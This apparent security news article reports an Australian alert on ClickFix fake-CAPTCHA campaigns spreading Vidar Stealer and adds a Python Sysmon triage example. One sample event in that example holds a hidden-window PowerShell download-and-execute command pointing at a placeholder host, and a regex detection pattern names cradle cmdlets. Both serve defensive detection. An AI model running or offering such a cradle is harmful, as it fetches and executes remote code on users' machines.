Australia’s Cyber Security Centre issued a formal warning, alerting domestic organizations to active ClickFix social-engineering campaigns delivering Vidar Stealer — an information-stealing malware capable of extracting browser credentials, session cookies, and cryptocurrency wallet data before self-deleting its disk presence and continuing to run from memory.
Compromised WordPress Sites Redirect Victims to Fake Cloudflare and CAPTCHA Verification Pages
The ACSC alert describes an attack chain that begins when a user visits a compromised WordPress website. The site silently redirects the visitor to a page displaying a counterfeit Cloudflare browser verification notice or a fake CAPTCHA prompt. Rather than completing an automated check, the page instructs the user to manually open a Windows Run dialog or PowerShell terminal and execute a command shown on screen. Complying with the instruction downloads and runs the Vidar Stealer payload.
The ClickFix technique exploits users’ familiarity with browser verification flows that appear on legitimate sites across the commercial web. Because the payload is ultimately delivered through deliberate user action rather than a drive-by exploit chain, the attack bypasses browser-based exploit mitigations and evades endpoint detection tools tuned to recognize automated download patterns. The requirement that a human complete the final step is precisely what makes this vector effective, even against technical users who might otherwise be alert to suspicious browser activity.
What Vidar Stealer Extracts and How It Erases Evidence of Its Presence
After execution, Vidar Stealer targets browser-stored passwords, active session cookies, autofill records, cryptocurrency wallet files, and system configuration details useful for follow-on targeting. It then deletes its own on-disk executable, removing the primary artifact that scheduled endpoint scans or alert-triggered reviews would detect. The malware transitions to memory-only operation after self-deletion.
The practical consequence for incident responders is significant: investigators who examine an affected machine may find no malware files, potentially clearing the system as uninfected while an active implant continues operating in a running process. Organizations that detect Vidar Stealer infections should treat all browser-stored credentials from the affected machine as compromised and initiate full credential rotation across associated accounts and services, regardless of whether on-disk evidence is present.
Dead-Drop C2 Resolution Through Telegram Channels and Steam Profile Pages
Vidar Stealer does not communicate with a fixed command-and-control server. Instead, it retrieves the address of its active C2 infrastructure by reading attacker-controlled accounts on Telegram channels and Steam profile pages. This dead-drop resolver technique allows operators to update their C2 endpoint by modifying a public post without recompiling or redeploying the malware binary.
The approach creates a network-level detection problem: blocking Vidar Stealer’s C2 resolution requires blocking Telegram or Steam, both of which carry legitimate operational use in enterprise and government environments. The technique closely parallels the Zulip API abuse documented in the ZiChatBot PyPI supply-chain campaign disclosed on the same day, pointing to broad adoption of legitimate platform abuse as a standard evasion layer among current information-stealing malware operators.
ACSC-Recommended Countermeasures and Defensive Limitations
The ACSC alert outlined three primary defensive measures: restricting PowerShell execution policies to prevent unsigned or user-supplied scripts from running; deploying application allow-listing to block unauthorized executables regardless of how they are delivered; and ensuring all WordPress installations are fully patched against the vulnerabilities attackers use to plant malicious redirect code on compromised sites.
The center emphasized that ClickFix campaigns depend entirely on persuading a user to execute a command they did not initiate. User awareness training is therefore a meaningful defensive layer — organizations should ensure staff understand that no legitimate browser verification service, CAPTCHA provider, or web portal will instruct users to open a terminal and run commands manually.
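As an added example (not from the ACSC alert or any vendor tooling), the following Python triages constructed Sysmon-style process-creation records for the execution pattern the alert describes: a shell spawned from explorer.exe, as the Run dialog does, combined with download-and-execute or hidden-window switches on the command line. The field names, parent-process assumption and sample events are assumptions for illustration; the point is that either signal alone is common benign activity, so only their coincidence is flagged.

```python
import re

# Constructed Sysmon EventID 1-style records (assumption: Sysmon field names); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/v)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Code.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},  # developer running a script from an editor
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c "dir"'},                           # harmless command typed into Run
]

# Assumption: Win+R (Run dialog) starts its child under explorer.exe, so a shell with that
# parent was typed by the user rather than started by an application or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Switches and cmdlets typical of a one-line download-and-execute cradle or a hidden window.
CRADLE_RE = re.compile(
    r"(?i)(invoke-expression|iex|downloadstring|invoke-webrequest|iwr|"
    r"-encodedcommand|-enc|-windowstyle hidden|-w hidden)")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the list of reasons this event resembles a user-pasted ClickFix command."""
    reasons = []
    if basename(ev["ParentImage"]) in INTERACTIVE_PARENTS and basename(ev["Image"]) in SHELLS:
        reasons.append("shell launched from explorer.exe (Run dialog / user-typed)")
    hits = sorted({m.lower() for m in CRADLE_RE.findall(ev["CommandLine"])})
    if hits:
        reasons.append("cradle or hidden-window switches: " + ", ".join(hits))
    return reasons

def triage(events):
    """Flag only events where both signals coincide; either alone is routine activity."""
    flagged = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) == 2:
            flagged.append((ev["CommandLine"], reasons))
    return flagged

if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print("ALERT:", cmdline, "|", "; ".join(reasons))
```

Because the payload later deletes its on-disk executable, the process-creation record may be the only durable artifact of the initial execution; forwarding it off-host matters more here than for conventional stealers.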
Australian infrastructure-sector organizations were specifically named among those targeted in the current campaign wave, though Vidar Stealer campaigns operate globally and have previously struck financial services, healthcare, and technology organizations. The combination of self-deletion, in-memory residency, and dead-drop C2 resolution substantially increases the cost and complexity of post-infection forensic investigation compared with conventional information-stealing malware that maintains an on-disk presence.
